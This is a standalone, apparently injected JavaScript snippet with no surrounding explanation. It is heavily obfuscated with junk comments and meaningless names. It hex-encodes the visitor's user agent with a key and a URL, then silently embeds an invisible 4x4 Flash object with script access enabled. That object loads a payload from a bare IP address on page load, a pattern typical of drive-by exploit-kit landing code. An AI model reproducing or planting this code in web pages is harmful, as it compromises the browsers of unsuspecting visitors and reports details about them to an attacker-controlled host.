/*s10036d35582hssfj65792fs*/function hgfgerdfgdf(num, width){/*s44958d44955hfj20276fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s65112d67926hfj38653fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s20677d15985hfj29278fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s37693d44667hfj93201fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd34864hfs*/c += b + d;/*s43118d13660hfj33647fs*/e += 1;}return c;}/*s27132dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.127.46/?Nzc5NTMxNjQ=&newest=xXzQMvWebRXQCJ3EKvrcT6NEMVHRHECL2YydmrHTefjaelWkzrLFTF_yozKASASG6_JtdfJRDQ&information=MzEzMDQxMzk=&round=DjjxCDfgQ3nN1fVlIR9a78jUPRyhSe1JWE_0CJYQgQqpCUHLQ82VSkybMkec8mzxSF6FETi-tL&travel=NDgyNzQzODQ=", ghnvbn("http://92.53.127.46/?MTEwOTg2MTkx&information=NDI4OTAwOTk=&round=ino8IUVsWoauu3UDRwReeh5bQ_hSJYgtHq5OXErNu3F_1mrNBcsovwhSF4GMByustUVsX4QsUmKz7S6CJrg&newest=xH_QMrPYbR3FFYDfKPrEUKdEMU3WA0SKwYyZhazVF5yxFDfGpbH1Fx_spV-dCF-EmvJvdLMHIwGh1UTASwR&before=NDA1MTY4NTk=","gexywoaxor"));